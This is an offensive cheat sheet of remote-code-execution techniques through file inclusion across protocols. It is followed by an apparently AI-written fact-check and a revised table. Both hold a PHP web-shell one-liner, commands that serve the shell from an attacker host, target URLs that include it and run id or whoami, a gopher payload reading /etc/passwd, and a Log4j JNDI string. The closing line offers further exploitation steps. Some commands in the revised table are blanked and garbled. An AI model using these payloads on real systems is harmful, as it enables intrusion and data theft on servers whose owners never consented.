4a. RCE

Protocol Description Example Exploit Command Exploitation URL / Command
HTTP (80/443) Delivers payload via a web request echo '<?php system($_GET["cmd"]); ?>' > shell.php

sudo python3 -m http.server <LISTEN_PORT>
http://<TARGET_IP>/index.php?language=http://<ATTACKER_IP>:8081/shell.php&cmd=id
FTP (21) Loads a malicious file via FTP sudo python -m pyftpdlib -p 21 http://<TARGET_IP>/index.php?language=ftp://<ATTACKER_IP>/shell.php&cmd=id
SMB (445) Exploits file inclusion via SMB share impacket-smbserver -smb2support share $(pwd) http://<TARGET_IP>/index.php?language=\<ATTACKER_IP>\share\shell.php&cmd=whoami
TFTP (69) Transfers a malicious script via TFTP atftp --put shell.php -r shell.php <TARGET_IP> http://<TARGET_IP>/index.php?language=tftp://<ATTACKER_IP>/shell.php&cmd=id
Gopher Abuses gopher:// to trigger SSRF/RCE gopher://<TARGET_IP>:3306/_%00SELECT%20load_file('/etc/passwd') Used for SSRF, sometimes leading to RCE
LDAP (389) Injects LDAP queries for RCE ldapsearch -x -H ldap://<TARGET_IP> -D "cn=admin,dc=example,dc=com" -w password Exploits LDAP misconfigurations
DNS (53) Transfers payload via DNS query dig @<TARGET_IP> example.com TXT Often used for

data exfiltration
NFS (2049) Mounts remote dirs to execute payload mount -t nfs <TARGET_IP>:/exports /mnt/nfs Execute payload inside the NFS share
WebDAV (80/443) Uploads and executes a web shell cadaver http://<TARGET_IP>/webdav Upload shell:

PUT shell.php
IMAP (143/993) Injects commands via email attachment openssl s_client -connect <TARGET_IP>:143 -quiet Send payload via IMAP command
SMTP (25/587) Sends payload via email headers swaks --to victim@example.com --from attacker@example.com --data "EHLO example.com\r\nMAIL FROM:<attacker>\r\nRCPT TO:<victim>\r\nDATA\r\n<?php system($_GET['cmd']); ?>\r\n.\r\n" Payload sent via

email body

Fact-Check

  1. HTTP (80/443)
  1. FTP (21)
  1. SMB (445)
  1. TFTP (69)
  1. Gopher
  1. LDAP (389)
  1. DNS (53)
  1. NFS (2049)
  1. WebDAV (80/443)
  1. IMAP (143/993)
  1. SMTP (25/587)
  • Description: Sends payload via email headers.

  • Example Exploit Command:

    swaks --to victim@example.com --from attacker@example.com --data "EHLO example.com\r\nMAIL FROM:\r\nRCPT TO:\r\nDATA\r\n\r\n.\r\n"
  • Check: Correct syntax for swaks, but headers don’t execute code—payload must be in the body and executed by a vulnerable app.

  • Exploitation URL:

  • Status: Partially Accurate. RCE depends on downstream processing.


  • Issues Found

    1. TFTP: Command syntax incorrect (atftp usage); needs a TFTP server setup instead.

    2. Gopher: Command is a payload URL, not a local command; RCE is indirect.

    3. LDAP: Overstates RCE; typically requires app-level vuln (e.g., Log4j).

    4. DNS: Not RCE; should be labeled as exfiltration only.

    5. IMAP: Misleading; RCE requires prior payload delivery (e.g., SMTP).

    6. SMTP: RCE overstated; depends on vulnerable email processing.


    Revised Table

    Here’s a corrected version with clarifications:

    Protocol Description Example Exploit Command Exploitation URL / Command
    HTTP (80/443) Delivers payload via web request echo '' > shell.php

    sudo python3 -m http.server 8081
    http://<TARGET_IP>/index.php?language=http://<ATTACKER_IP>:8081/shell.php&cmd=id
    FTP (21) Loads malicious file via FTP sudo python -m pyftpdlib -p 21 http://<TARGET_IP>/index.php?language=ftp://<ATTACKER_IP>/shell.php&cmd=id
    SMB (445) Exploits file inclusion via SMB impacket-smbserver -smb2support share $(pwd) http://<TARGET_IP>/index.php?language=\<ATTACKER_IP>\share\shell.php&cmd=whoami
    TFTP (69) Transfers malicious script via TFTP sudo tftpd -L -p 69

    (serve

    shell.php

    )
    http://<TARGET_IP>/index.php?language=tftp://<ATTACKER_IP>/shell.php&cmd=id
    Gopher SSRF via gopher://, may lead to RCE curl "gopher://<TARGET_IP>:3306/_%00SELECT%20load_file('/etc/passwd')" SSRF, indirect RCE via backend vuln
    LDAP (389) RCE via LDAP injection (app vuln) ldapsearch -x -H ldap://<TARGET_IP> -D "cn=admin,dc=example,dc=com" -w password Requires app vuln (e.g., Log4j:

    ${jndi:ldap://<ATTACKER_IP>/a}

    )
    DNS (53) Data exfiltration via DNS query dig @<TARGET_IP> example.com TXT Exfiltration, not RCE
    NFS (2049) Mounts remote dirs for payload mount -t nfs <TARGET_IP>:/exports /mnt/nfs Execute payload via LFI (e.g.,

    file:///mnt/nfs/shell.php

    )
    WebDAV (80/443) Uploads web shell via WebDAV cadaver http://<TARGET_IP>/webdav

    +

    put shell.php
    Upload shell:

    PUT shell.php
    IMAP (143/993) RCE via email (requires delivery) openssl s_client -connect <TARGET_IP>:143 -quiet

    (after SMTP delivery)
    Payload executed by vuln client/server
    SMTP (25/587) Delivers payload via email swaks --to victim@example.com --data "" RCE via vuln email processing

    Final Verdict

    The table is solid with minor refinements. Let me know if you want detailed exploitation steps for any protocol!